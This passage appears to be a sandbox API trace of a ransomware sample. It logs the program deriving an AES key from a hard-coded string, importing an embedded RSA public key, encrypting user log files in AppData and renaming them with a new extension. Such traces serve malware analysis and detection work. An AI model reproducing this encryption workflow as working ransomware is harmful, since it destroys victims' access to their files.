KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.844] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0265.845] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2e77ca0) returned 1 [0265.845] CryptImportPublicKeyInfo (in: hCryptProv=0x2e77ca0, dwCertEncodingType=0x1, pInfo=0x2eb05b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb05e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb05e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7f840) returned 1 [0265.845] CryptEncrypt (in: hKey=0x2e7f840, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0265.845] CryptEncrypt (in: hKey=0x2e7f840, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e78960*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2e78960*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0265.845] WriteFile (in: hFile=0x5d44, lpBuffer=0x2e78960*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2e78960*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0265.846] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.848] CryptEncrypt (in: hKey=0x2e7f140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0265.848] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.853] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.853] CryptEncrypt (in: hKey=0x2e7f140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0265.853] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.853] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x21e, lpOverlapped=0x0) returned 1 [0265.853] CryptEncrypt (in: hKey=0x2e7f140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x21e, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x220) returned 1 [0265.853] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x220, lpOverlapped=0x0) returned 1 [0265.853] CloseHandle (hObject=0x5d3c) returned 1 [0265.853] CloseHandle (hObject=0x5d44) returned 1 [0265.853] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\mmc.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\mmc.exe.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\mmc.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\mmc.exe.log"), bFailIfExists=0) returned 1 [0265.857] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\mmc.exe.log", dwFileAttributes=0x0) returned 1 [0265.857] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\mmc.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\mmc.exe.log.gsg")) returned 1 [0265.859] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\mmc.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\mmc.exe.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\mmc.exe.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\mmc.exe.log.fuck")) returned 1 [0265.860] CryptDestroyHash (hHash=0x2e7eb80) returned 1 [0265.860] CryptDestroyKey (hKey=0x2e7f140) returned 1 [0265.860] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.860] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.860] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0265.860] GetLastError () returned 0x0 [0265.860] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\NGenTask.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\ngentask.exe.log")) returned 0x20 [0265.861] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\NGenTask.exe.log", dwFileAttributes=0x80) returned 1 [0265.861] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\NGenTask.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\ngentask.exe.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.862] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\NGenTask.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\ngentask.exe.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0265.863] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\NGenTask.exe.log.gsg", dwFileAttributes=0x2) returned 1 [0265.863] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2e7a500) returned 1 [0265.866] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0265.866] lstrlenA (lpString="PvMwiXwJkKzPixDiGqwlDZbNzMlQm") returned 29 [0265.866] CryptHashData (hHash=0x2e7f280, pbData=0x28cb5f8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.866] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7f280, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7f700) returned 1 [0265.866] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.866] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0265.866] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2e780e0) returned 1 [0265.866] CryptImportPublicKeyInfo (in: hCryptProv=0x2e780e0, dwCertEncodingType=0x1, pInfo=0x2eb11e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1210*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1218*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7f340) returned 1 [0265.867] CryptEncrypt (in: hKey=0x2e7f340, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0265.867] CryptEncrypt (in: hKey=0x2e7f340, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e77c18*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2e77c18*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0265.867] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2e77c18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2e77c18*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0265.868] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x282, lpOverlapped=0x0) returned 1 [0265.882] CryptEncrypt (in: hKey=0x2e7f700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x282, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x290) returned 1 [0265.882] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x290, lpOverlapped=0x0) returned 1 [0265.884] CloseHandle (hObject=0x5d44) returned 1 [0265.884] CloseHandle (hObject=0x5d3c) returned 1 [0265.884] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\NGenTask.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\ngentask.exe.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\NGenTask.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\ngentask.exe.log"), bFailIfExists=0) returned 1 [0265.887] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\NGenTask.exe.log", dwFileAttributes=0x0) returned 1 [0265.888] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\NGenTask.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\ngentask.exe.log.gsg")) returned 1 [0265.891] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\NGenTask.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\ngentask.exe.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\NGenTask.exe.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\ngentask.exe.log.fuck")) returned 1 [0265.892] CryptDestroyHash (hHash=0x2e7f280) returned 1 [0265.892] CryptDestroyKey (hKey=0x2e7f700) returned 1 [0265.892] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.892] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.892] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0265.892] GetLastError () returned 0x0 [0265.892] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\powershell.exe.log")) returned 0x20 [0265.893] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log", dwFileAttributes=0x80) returned 1 [0265.893] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\powershell.exe.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0265.894] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\powershell.exe.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.895] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log.gsg", dwFileAttributes=0x2) returned 1 [0265.895] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2e7a500) returned 1 [0265.897] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0265.897] lstrlenA (lpString="PvMwiXwJkKzPixDiGqwlDZbNzMlQm") returned 29 [0265.897] CryptHashData (hHash=0x2e7f880, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.897] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7f880, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7f480) returned 1 [0265.897] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.897] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0265.897] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2e787c8) returned 1 [0265.898] CryptImportPublicKeyInfo (in: hCryptProv=0x2e787c8, dwCertEncodingType=0x1, pInfo=0x2eb12b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb12e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb12e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7f780) returned 1 [0265.898] CryptEncrypt (in: hKey=0x2e7f780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0265.898] CryptEncrypt (in: hKey=0x2e7f780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e78c08*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2e78c08*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0265.898] WriteFile (in: hFile=0x5d44, lpBuffer=0x2e78c08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2e78c08*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0265.899] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.906] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0265.906] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.907] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.907] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0265.907] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.908] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.908] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0265.908] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.908] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.908] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0265.908] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0265.908] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0xa4, lpOverlapped=0x0) returned 1 [0265.908] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xa4, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xb0) returned 1 [0265.908] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0xb0, lpOverlapped=0x0) returned 1 [0265.908] CloseHandle (hObject=0x5d3c) returned 1 [0265.908] CloseHandle (hObject=0x5d44) returned 1 [0265.908] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\powershell.exe.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\powershell.exe.log"), bFailIfExists=0) returned 1 [0265.910] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log", dwFileAttributes=0x0) returned 1 [0265.911] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\powershell.exe.log.gsg")) returned 1 [0265.912] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\powershell.exe.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\powershell.exe.log.fuck")) returned 1 [0265.913] CryptDestroyHash (hHash=0x2e7f880) returned 1 [0265.913] CryptDestroyKey (hKey=0x2e7f480) returned 1 [0265.913] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.913] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.913] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0265.913] GetLastError () returned 0x0 [0265.913] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\sdiagnhost.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\sdiagnhost.exe.log")) returned 0x20 [0265.914] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\sdiagnhost.exe.log", dwFileAttributes=0x80) returned 1 [0265.914] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\sdiagnhost.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\sdiagnhost.exe.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.915] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\sdiagnhost.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\sdiagnhost.exe.log.gsg"), dwDesiredAccess=0xc0000000, 